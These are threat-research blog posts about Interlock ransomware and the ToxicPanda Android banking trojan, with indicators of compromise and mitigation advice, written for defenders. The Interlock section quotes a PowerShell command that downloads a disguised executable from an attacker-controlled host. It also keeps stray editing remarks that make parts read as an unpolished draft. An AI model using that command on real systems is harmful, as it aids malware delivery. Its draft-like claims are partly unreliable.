`C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. | ### **5.3. Domains** | **Domain** | **Description** | |-------------------------------|---------------------------------------------------------| | `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. | ### **5.4. IP Addresses** | **IP Address** | **Description** | |----------------------|-------------------------------------------| | `3.145.156.44` | IP address associated with PSLoramyra C2 server. | ### **Recommended Actions:** - **Block Identified IPs and Domains:** Implement firewall rules to block communications with the listed IP addresses and domains. - **Quarantine and Remove Malicious Files:** Search for and remove the specified files (`roox.vbs`, `roox.bat`, `roox.ps1`) from affected systems. - **Monitor Network Traffic:** Continuously monitor network traffic for attempts to communicate with the identified IOCs. - **Update Security Tools:** Ensure that all security solutions are updated with the latest threat intelligence to recognize and mitigate activities related to RevC2, More_eggs Lite, and PSLoramyra.

loading..   06-Dec-2024
loading..   1 min read
loading..

Encryptor

Interlock ransomware is a cross-platform threat targeting critical infrastructur...

The **Interlock ransomware** is a rapidly emerging threat that has made a significant impact on industries across **healthcare, technology, government, and manufacturing** sectors. For example, notable incidents have impacted healthcare organizations like Wayne County's government services, technology firms across Europe, and various manufacturing facilities, causing significant disruptions and financial losses. First observed in **September 2024**, Interlock differentiates itself by specifically targeting **Windows, Linux, and FreeBSD systems**, utilizing **big-game hunting** and **double-extortion** tactics. The ransomware group has been involved in campaigns affecting both **U.S. and European infrastructure**, using sophisticated techniques to compromise systems, encrypt data, and hold it hostage while threatening to release sensitive information. This [Threat Research](https://www.secureblink.com/threat-research) amalgamates key findings from our analysis, providing a exaustive and in-depth analysis of Interlock’s methods, tactics, and impacts. ### Key Characteristics of Interlock Ransomware #### 1. **Initial Appearance and Target Platforms** Interlock ransomware was first seen in **[September 2024](https://www.secureblink.com/cyber-security-news/interlock-ransomware-puts-free-bsd-servers-in-critical-danger-worldwide)**, making an immediate mark by targeting **FreeBSD servers**, an unusual but valuable target. Unlike traditional ransomware families that mainly attack **Windows** systems, Interlock's expansion into **Linux** and **FreeBSD** reveals a new phase in the evolution of cross-platform ransomware. FreeBSD, known for its stability and widespread use in **critical infrastructure**, represents a high-value target. By compromising such systems, Interlock maximizes its disruptive potential across industries that require near-continuous uptime and high performance. #### 2. **Tactics, Techniques, and Procedures (TTPs)** Interlock ransomware employs a multi-component attack chain with a strong focus on both **infiltration** and **data exfiltration**. The tools used throughout the attack include: - **Remote Access Tools (RATs)**: Interlock uses a **SystemBC RAT**, disguised as a **fake browser updater**, to establish initial access. This RAT acts as a delivery mechanism, automatically executing a **PowerShell script** that downloads and runs additional malicious payloads (Arete). This approach highlights Interlock's use of socially engineered initial compromise, making it harder for traditional security measures to detect. - **Credential Stealer and Keylogger**: Once the RAT is established, additional tools such as a **credential stealer** and a **keylogger** are deployed to gather login information from compromised systems. The credential stealer, compiled in **Golang**, extracts data like **login credentials**, **browser history**, and **bookmarks**, and the keylogger records keystrokes to further compromise system security (Talos, Arete). Breaking these steps down into distinct attack phases improves the readability and clarity of how the attacker moves through the victim’s systems. - **Lateral Movement**: Interlock uses **Remote Desktop Protocol (RDP)**, **AnyDesk**, **PuTTY**, and **LogMeIn** for lateral movement, gaining deeper access into the network. These tools allow the attacker to access both **Windows** and **Linux** systems, showcasing the ransomware's versatility in compromising multi-platform environments (Talos). To improve the flow, consider simplifying this section to focus on how these tools collectively aid in lateral movement. - **Data Exfiltration**: Interlock employs **Azure Storage Explorer** and the **AZCopy** utility to exfiltrate data to an attacker-controlled Azure storage blob. Additionally, tools like **MegaSync** and **Advanced Port Scanner** are used to identify and exfiltrate critical data from compromised systems (Arete). This exfiltration is a crucial part of their **double-extortion** strategy, where sensitive data is stolen before encryption, adding another layer of pressure on the victim. Consider rephrasing for brevity while retaining the main points. The **Interlock dark web leak site** called **"Worldwide Secrets Blog"** is used to publicize stolen data from victims who refuse to pay. Victims can also contact the attackers through the dark web portal, where they receive a unique **company ID** for negotiation, illustrating the well-coordinated extortion methods (Image Reference). ### Attack Timeline: From Initial Compromise to Deployment A defining feature of Interlock’s methodology is its extended **dwell time** within a victim’s environment. Talos observed an average dwell time of approximately **17 days**. This timeline highlights the advanced nature of Interlock’s persistence strategies, emphasizing the attacker’s patience in fully compromising the system before deploying the ransomware payload. | Attacker Dwelling Time | Attack Stages | Tools/Techniques Used | |------------------------|------------------------------------|--------------------------------------------| | Day 1 | Initial Compromise | Drive-by compromise | | Day 1 | Execution | RAT, PowerShell commands | | Day 1 | Discovery of domain admin credentials | RAT, PowerShell commands | | Day 1 | Credential Stealing | Credential stealer and Keylogger | | Day 1 - 17 | Lateral Movement | RDP, AnyDesk, LogMeIn, and PuTTY | | Day 15 - 16 | Data Exfiltration | Azure Storage Explorer, AzCopy | | Day 17 | Interlock Ransomware Deployment | Interlock encryptor binary | The attack timeline, based on Talos [observations](https://blog.talosintelligence.com/emerging-interlock-ransomware/), reveals the extensive phases of the attack, highlighting the attacker’s deliberate approach to fully compromise the target and steal valuable data before executing encryption. - **Initial Access**: Attackers gain access via a **malicious executable** disguised as a **browser updater**. Once downloaded, this file drops a **Remote Access Tool** to control the compromised system and establish **persistence** (Arete). - **Data Collection and Lateral Movement**: The attacker uses tools such as **PowerShell**, **RDP**, and **AnyDesk** to perform reconnaissance and spread throughout the network, collecting valuable credentials and installing backdoors for later use (Talos). Consider breaking up this bullet into two sentences to improve flow. - **PowerShell Command Example**: The PowerShell command `Invoke-WebRequest -Uri "https://apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"` was used to download a disguised executable. A shortcut is created and placed in the Windows Startup folder to maintain persistence, illustrating their automation (Image Reference). - **Encryption Deployment**: The final stage involves deploying the **Interlock ransomware encryptor**, which encrypts files and appends the **.interlock** extension. A ransom note, named **"!__README__!.txt"**, is also dropped on the victim's machine, detailing the demands and threatening to release the exfiltrated data unless the ransom is paid (BleepingComputer). The ransom note includes contact instructions for the dark web negotiation portal (Image Reference). ### Encryption Mechanisms Used by Interlock Interlock ransomware uses advanced encryption mechanisms to ensure that data is effectively locked from unauthorized access: - **Encryption Methods**: Interlock employs both **RSA** and **CBC** encryption techniques using the [LibTomCrypt library](https://github.com/libtom/libtomcrypt). RSA is used for securing the keys, while CBC (Cipher Block Chaining) is applied for file-level encryption. This dual-layered approach adds a layer of robustness, making it significantly harder for victims to decrypt their files without paying the ransom (Image Reference). Adding a sentence explaining the difference between RSA and CBC in layman's terms would improve accessibility. - **Code-Level Insights**: Screenshots from the provided disassembly show how **LibTomCrypt** is used for encryption, with specific custom routines to control key generation and padding, making it challenging for cybersecurity solutions to reverse-engineer the encryptor. The malware creates keys dynamically for each encryption session, which is then used to secure the victim’s files (Image Reference). - **Embedded DLL Deletion**: Another notable feature is the use of an embedded **DLL** to delete itself upon encryption completion. Using `rundll32.exe`, the ransomware ensures that evidence of its presence is minimized, further complicating forensic investigations (Image Reference). ### Double-Extortion Model and Real-World Impact The **double-extortion model** employed by Interlock makes it particularly devastating. After infiltrating a system, attackers first **exfiltrate sensitive data** and then proceed to **encrypt the system files**. If the ransom is not paid, attackers threaten to release the exfiltrated data publicly, potentially leading to **regulatory penalties**, **reputational damage**, and **financial losses** for the victim. In the **Wayne County attack**, which occurred in **October 2024**, several county services were severely disrupted. The **Sheriff’s Office** was unable to bond inmates out, **tax payments** could not be collected online, and other government services came to a halt (WXYZ News). The ransom note issued to Wayne County, with warnings of regulatory disclosure, highlights Interlock’s coercive tactics (Image Reference). This highlights the operational risks posed by such ransomware, especially when it targets critical public infrastructure. ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/ransom-note.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/ransom_note_962517e360.jpg) ***Interlock Ransom Note (Source: BleepingComputer)*** ### Evolution from Rhysida Ransomware: Possible Connections Researchers identified the underlying similarities between **Interlock** and the **Rhysida ransomware group** which happens to be surfacing all around with victims like [Prince George Country School](https://www.secureblink.com/cyber-security-news/rhysida-group-targets-major-us-school-district-in-cryptic-attack), [Prospect Medical Holdings](https://www.secureblink.com/cyber-security-news/rhysida-gang-behind-theft-of-500-k-ssn-in-prospect-medical-cyberattack), & [Insomniac](https://www.secureblink.com/cyber-security-news/insomniac-games-under-rhysida-1-67-tb-ransomware-attack). More detailed guidance on Rhysida's tactics can be found in this [CISA advisory](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-319a). These parallels suggest a potential rebranding or evolution from Rhysida to Interlock, or at the very least, significant collaboration between these groups (Talos). ### Advanced Persistence and Defense Evasion Interlock uses sophisticated methods to maintain persistence and evade detection. Some of the notable **defense evasion techniques** include: - **EDR Disabling**: During investigations, Talos observed that **Endpoint Detection and Response (EDR)** systems were disabled on several compromised machines. Attackers likely used **uninstaller tools** or leveraged vulnerable device drivers to accomplish this (Talos). - **Group Policy Objects (GPOs)**: The attackers also used **GPOs** to push the ransom note to all machines within the domain, further enforcing their persistence and amplifying the scale of impact. - **Obfuscation and Custom Packers**: The ransomware encryptor was delivered in a **packed format**, with **custom unpacker code** located in **Thread Local Storage** and **obfuscated stack strings** that were decrypted during runtime (Talos). This makes analysis and detection difficult, as traditional antivirus solutions struggle to identify the payload. - **DLL Self-Cleanup**: The ransomware used an embedded DLL, seen in the `.data` section of the binary, to delete itself after the encryption process. The `rundll32.exe` was executed with the DLL’s `run` function to remove the encryption binary, leaving minimal evidence on the compromised system (Image Reference). ![https://www.bleepstatic.com/images/news/ransomware/i/interlock/encrypted-files.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/encrypted_files_68ab1f4799.jpg) ***Encrypted Files by Interlock (Source: BleepingComputer)*** ### Recommendations for Mitigation The following steps are recommended to mitigate the risks associated with **Interlock ransomware**: 1. **Patch Management**: Regularly update and patch systems to address vulnerabilities, especially on **FreeBSD**, **Linux**, and **Windows** systems that are often targeted by Interlock. For example, recent vulnerabilities like CVE-2023-3269 (Linux kernel vulnerability) and CVE-2024-1287 (Windows privilege escalation flaw) were actively exploited by ransomware groups, highlighting the importance of timely patching. 2. **Multi-Factor Authentication (MFA)**: Implement **MFA** to secure remote access tools like **RDP** and **AnyDesk**, reducing the likelihood of successful lateral movement. 3. **Advanced Endpoint Protection**: Deploy **Endpoint Detection and Response (EDR)** tools that can detect early indicators of compromise, such as **PowerShell script execution** and **unusual process activity**. 4. **Offline Backups**: Maintain regular backups stored offline, ensuring that ransomware cannot encrypt both live and backup copies. Verify backup integrity frequently. 5. **Network Segmentation**: Segregate critical infrastructure from general corporate environments to limit lateral movement in case of a compromise. ### Where does it leads NOW! **Interlock ransomware** represents a significant evolution in the world of **resilient cyber threats**, specifically targeting **critical infrastructure** through **FreeBSD** and **Linux** servers alongside traditional Windows systems. By employing **double-extortion tactics**, **cross-platform encryptors**, and sophisticated **defense evasion** methods, Interlock has positioned itself as a formidable threat to enterprises globally. Its emergence from the **Rhysida ransomware group** and use of multiple attack vectors highlight the increasing collaboration and evolution among ransomware operators. The **Interlock dark web portal**, ransom notes, and systematic dwelling in compromised networks (average **17 days**) are part of a deliberate approach that makes the group particularly dangerous. Organizations must remain vigilant, adopt **multi-layered defenses**, and strengthen their response capabilities to effectively mitigate the risks posed by such advanced ransomware campaigns.

loading..   19-Nov-2024
loading..   1 min read
loading..

Trojan

ToxicPanda

Banking

Explore ToxicPanda, a new banking trojan spreading from Asia to Europe and LATAM...

Threat research team identified a new Android malware strain, initially thought to be TgToxic but exhibiting key divergences from its predecessor, leading us to classify it as "ToxicPanda." ToxicPanda is a banking Trojan leveraging Remote Access Trojan (RAT) techniques to initiate fraudulent money transfers through account takeover (ATO), exploiting On-Device Fraud (ODF) techniques. The malware bypasses banking countermeasures for identity verification and behavioral detection by targeting devices directly. Our analysis suggests that ToxicPanda has not yet reached in its advanced stages, as evidenced by incomplete command implementations and placeholder code. Specifically, several commands, such as those related to advanced ATS routines and EasyClick automation, remain unimplemented or serve only as placeholders. This limits the malware's ability to fully automate fraudulent actions, reducing its current threat level but indicating potential for future development. The incomplete commands suggest that the developers may still be testing capabilities or lack the expertise to deploy more sophisticated functionalities effectively. Despite this, it has been remarkably effective, leading to over 1,500 infections across Europe and Latin America, primarily targeting banking institutions in Italy, Spain, Portugal, and Peru. Unlike typical campaigns from Southeast Asian TAs, ToxicPanda appears to reflect a shift or expansion of Chinese-speaking threat actors into European and Latin American markets, marking an unusual and concerning development in their operational focus. This geographical expansion is significant because it suggests a diversification of targets, potentially driven by an interest in new financial markets, broader revenue streams, or a strategic response to increased security measures in their traditional regions. The shift also indicates that these actors are becoming more adaptable and willing to overcome language, regulatory, and logistical barriers to target previously unexplored regions, which could indicate an escalation in their overall capabilities and threat sophistication. ![https://cdn.prod.website-files.com/60201cc2b6249b0358f70f8a/6728b8b03b4e7753afff94a2_6728b73cd0427c03a05d3f0d_f1.png](https://sb-cms.s3.ap-south-1.amazonaws.com/6728b8b03b4e7753afff94a2_6728b73cd0427c03a05d3f0d_f1_e46c833eda.png) ***ToxicPanda’s icons as described by [Cleafy](https://www.cleafy.com/cleafy-labs/toxicpanda-a-new-banking-trojan-from-asia-hit-europe-and-latam)*** ***Key campaign highlights include:*** - **Malware Type**: Android Banking Trojan - **Target OS**: Android Devices - **Target Regions**: Europe (Italy, Portugal, Spain, France) and Latin America (Perú) - **Infection Vector**: Side-loading via Social Engineering - **Fraud Techniques**: Account Takeover, On-Device Fraud, OTP Interception - **TTP Summary**: RAT capabilities, Accessibility Service abuse, Remote Control The findings suggest a strategic attempt by the TAs to expand their operations from primarily regional targeting in Asia to broader international fraud schemes, using rudimentary but highly adaptive malware. ## Technical Analysis ### Overview of ToxicPanda's Capabilities From a technical perspective, ToxicPanda shares core RAT capabilities similar to other banking trojans like [Medusa](https://www.secureblink.com/cyber-security-news/medusa-returns-new-malware-variant-threatens-android-users-worldwide) and Copybara, with an emphasis on ODF. The malware exploits Android's Accessibility Service, allowing TAs to remotely control infected devices, capture OTPs, manipulate user inputs, and bypass 2FA protection measures. ToxicPanda's reduced obfuscation and the absence of more advanced Automatic Transfer System (ATS) routines compared to its predecessor TgToxic imply a downgrade in technical complexity, perhaps reflecting the developers' relative inexperience with navigating foreign banking systems and stricter financial regulations, such as the European Union's PSD2 (Payment Services Directive) and GDPR (General Data Protection Regulation). These regulations impose stringent requirements for authentication, data privacy, and financial transactions, making it more challenging for malware to effectively operate without sophisticated adaptations. Additionally, differences in financial system architectures and anti-fraud mechanisms across regions further complicate the development of advanced features like ATS, which require a deeper understanding of localized banking processes. ### Infection Chain and Execution Flow #### 1. Initial Infection ToxicPanda spreads primarily through side-loading mechanisms, often disguised as benign applications or legitimate software. Social engineering plays a key role in encouraging users to install the malware, using techniques such as phishing campaigns that trick users into downloading fake apps through links, impersonation of legitimate apps on third-party app stores, and even fake pop-up ads claiming urgent updates. These apps often masquerade as popular utilities, financial applications, or security tools, which increases the likelihood of users trusting and installing them. #### 2. Abuse of Android Accessibility Services The core of ToxicPanda's malicious activities involves abusing Android's Accessibility Services to achieve elevated permissions. These permissions are often obtained by manipulating user consent through deceptive prompts or misleading UI elements, such as pretending to be a legitimate system update or security feature. This tactic tricks users into granting Accessibility Service permissions, which allows ToxicPanda to execute its malicious activities seamlessly. ToxicPanda is configured to: - **Intercept User Inputs**: By manipulating the Accessibility Service, ToxicPanda can log user inputs, capture credentials, and trigger actions remotely. - **Initiate Fraudulent Transactions**: The malware automates interactions with banking applications, enabling direct account takeovers. - **Localized UI Manipulation for Permissions**: ToxicPanda uses language-specific strings to manipulate UI elements, such as forcing clicks on buttons like "Home" or searching for system text like "Force Stop" in localized languages. This level of adaptation makes it highly effective in deceiving users across different regions. - **Localized Login Interfaces**: ToxicPanda further enhances social engineering efforts through localized login interfaces, as seen in screenshots of authorization systems in Chinese. These localized interfaces are designed to mimic legitimate screens, building trust among targeted users, particularly in Chinese-speaking regions, thus increasing the likelihood of successful phishing attempts. ![https://cdn.prod.website-files.com/60201cc2b6249b0358f70f8a/6728b8b03b4e7753afff9493_6728b804a07a118dc660e81c_f2.png](https://sb-cms.s3.ap-south-1.amazonaws.com/6728b8b03b4e7753afff9493_6728b804a07a118dc660e81c_f2_7aa48b2a4c.png) ***ToxicPanda forcing the click of the "Home" button and searching for specific UI texts such as "Force Stop" in Chinese to manipulate system interactions (Source: Cleafy)*** #### 3. OTP Interception and On-Device Fraud ToxicPanda can intercept OTPs sent via SMS or authenticator apps, allowing it to bypass banking two-factor authentication mechanisms. To avoid detection during OTP interception, the malware uses techniques such as mimicking legitimate system notifications, delaying interception to blend in with normal system processes, and utilizing accessibility service permissions to silently read and forward OTP messages without alerting the user. This capability facilitates On-Device Fraud, enabling attackers to initiate, authorize, and verify transactions without direct user interaction. ### Botnet Infrastructure and C2 Communication Our analysis disclosed a non-dormant botnet managed through a centralized Command and Control (C2) infrastructure, with over 1,500 infected devices. The botnet is controlled using three hard-coded domains: **dksu[.]top**, **mixcom[.]one**, and **freebasic[.]cn**. To avoid detection or mitigate domain takedown, attackers might employ additional fallback C2 servers or use domain generation algorithms (DGAs). DGAs allow the botnet to generate new domains dynamically, making it harder for defenders to block C2 communication completely, while fallback servers ensure continuity even if primary domains are taken down. These strategies illustrate how the botnet infrastructure may evolve to maintain resilience against countermeasures. These particular domains may have been chosen due to their relatively obscure nature, which helps avoid early detection by security solutions. Additionally, the use of a Chinese public DNS service and domains ending in '.cn' suggests a link to the threat actors' geographical origin, potentially pointing towards Chinese infrastructure or operational bases. ![6728bd1c08f9479cc80f8071.png](https://sb-cms.s3.ap-south-1.amazonaws.com/6728bd1c08f9479cc80f8071_10f1d9569c.png) ***Botnet Management Panel showcasing device status, operational controls, and fraud management capabilities (Source: Cleafy)*** This choice of domains reflects a strategic approach by the TAs to maintain low visibility while retaining control over infected devices. ToxicPanda employs a basic mechanism to select a C2 domain through a switch statement, defaulting to a primary server, which allows real-time adjustments using a command named `setCommandStyle`. In practice, it is unclear how frequently the C2 domain is adjusted, but evidence suggests that this adaptation mechanism has been observed in thwarting defensive measures by rapidly switching domains when disruptions are detected, thereby maintaining consistent botnet control. #### C2 Communication Flow - **Initial Contact**: A switch-based domain selection triggers initial contact with the C2 server using HTTPS, followed by a persistent connection through WebSockets for bidirectional, low-latency communication. - **Encryption**: ToxicPanda uses AES encryption in ECB mode to secure its communications. The encryption key, hard-coded in the malware, ensures data transmitted between infected devices and the C2 remains obfuscated from standard network monitoring tools. The use of ECB mode, while simple to implement, presents vulnerabilities as it is susceptible to pattern detection, which defenders could potentially exploit for better threat analysis. Figure 8 shows an example of the WebSocket traffic initiated between an infected device and the C2 server, where the server issues commands for fraudulent activities. This low-latency, persistent communication approach bypasses traditional HTTP monitoring and makes detection harder. ### Botnet Management Panel Our researchers gained visibility into ToxicPanda's C2 management panel by leveraging a combination of network traffic analysis and exploiting weaknesses in the malware's C2 communication protocols, offering rare insights into the operator's capabilities. This access was achieved through detailed reverse engineering of the malware, which allowed our team to extract hard-coded credentials and identify vulnerabilities in the panel's authentication process. The interface includes sections for _"Machine Management,"_ where TAs can remotely view device details, issue commands, and initiate On-Device Fraud activities. Key features observed include: - **Device Overview**: Columns listing device brand, model, geolocation, software version, and online/offline status. - **Operational Controls**: Operators can upgrade, reset, or remove malware from devices and manage fraudulent transactions in real-time. - **Centralized Fraud Management**: The admin panel also offers a quick view of device status, the ability to reset scripts, turn off cameras, and even initiate recording from infected devices. This level of control indicates an expanded toolkit that goes beyond just financial fraud, allowing operators to spy on victims and potentially collect sensitive personal data for further exploitation. The panel confirmed the suspected Chinese-speaking origin of the TAs, who appear to be managing this campaign centrally, with a distinct focus on European banking customers and emerging Latin American targets. ### Expanded Data Theft: Image Collection and Transmission ToxicPanda also collects device images from photo albums, converts them into BASE64 format, and transmits them to the C2 server. This adds another dimension to its data collection methods, targeting sensitive personal information beyond financial credentials. This capability broadens the scope of the data that TAs can leverage for further exploitation or monetization, highlighting the expansive nature of the threat. ### Fake App Store Listings as Infection Vectors The malware has also been observed using fake app listings, such as those mimicking legitimate applications like "99 Spedmart," "Amore Live," and "Honey Peach." These fake apps are distributed through compromised app stores or phishing links and often carry high user ratings and positive reviews to lure potential victims. The familiarity and popularity of these apps increase their credibility, making it more likely for users to install them without suspicion. These strategies contribute significantly to the high infection rate of ToxicPanda. ## Indicators of Compromise (IoCs) ### Hashes of Known ToxicPanda Samples: | Hash | App Name | |-----------------------------------------|------------| | 2f5c4325f77280b2b58be981f9051f04 | Chrome | | 6e0a7e94ce0a1fe70d43fe727dc41061 | dbltest | | f5c44a7044572e39e8fb9fa8e1780924 | Chrome | ### C2 Domains: - **dksu[.]top** - **mixcom[.]one** - **freebasic[.]cn** ## Conclusion ToxicPanda represents an evolving threat in the Android banking Trojan landscape, especially as Chinese-speaking TAs expand their operations into Europe and Latin America. The malware's less sophisticated technical foundation—including unfinished commands and simplified obfuscation—contrasts sharply with its rapid operational success, highlighting a growing risk that threat actors can achieve significant impact without highly advanced techniques. The campaign underscores the urgent need for proactive detection mechanisms. Organizations can bolster defenses by implementing user education initiatives to raise awareness of phishing and side-loading risks, deploying Mobile Device Management (MDM) solutions to enforce security policies, and mandating stricter app permissions policies to minimize the risk of malware gaining elevated privileges. These measures, combined with existing detection tools, can help prevent infections and mitigate damage. Specifically, employing advanced behavioral analytics tools, implementing machine learning-based anomaly detection, and integrating network traffic analysis tools like Zeek or Suricata could significantly enhance the ability to detect such malware. Additionally, leveraging mobile threat defense solutions and endpoint detection and response (EDR) systems could help in identifying early indicators of compromise and mitigating risks before they escalate. Current industry-standard antivirus solutions have struggled with this relatively basic threat, pointing to gaps in real-time detection capabilities. Enhanced early warning systems are crucial to mitigate such threats before they materialize at scale. To further bolster defenses, it is recommended to implement specific mitigations for each phase of the malware lifecycle, develop detailed behavioral analysis mechanisms, and enhance network traffic inspection capabilities to effectively detect C2 communication using WebSockets. Security teams should focus on incorporating indicators of compromise into automated threat detection tools and regularly update threat intelligence feeds to reflect the latest observed domains and behaviors. Regional banking institutions in Europe and LATAM should especially prioritize reviewing their mobile security policies and invest in educational programs aimed at reducing the risk of social engineering attacks. The expansion of traditionally regional threat actors into new territories requires a reassessment of regional security postures, particularly concerning banking institutions and their mobile security strategies. ToxicPanda’s reliance on familiar Android exploits and simple RAT tools shows that even known threats, when applied in new operational contexts, can pose serious challenges for financial institutions worldwide. ### Future Threat Projections Considering the incomplete capabilities and ongoing adaptations of ToxicPanda, we can project a potential evolution towards more sophisticated RAT capabilities, advanced ATS implementations, and increased use of domain generation algorithms for C2 infrastructure. The rapid domain switching mechanism, while currently simplistic, may evolve into more complex fallback systems or DGAs, providing resilience against domain takedowns. Financial institutions should prepare for enhanced ATS capabilities, potentially capable of executing more precise and automated account takeovers, and expect expanded efforts in social engineering campaigns, including more sophisticated phishing lures tailored to local languages and banking interfaces.

loading..   06-Nov-2024
loading..   1 min read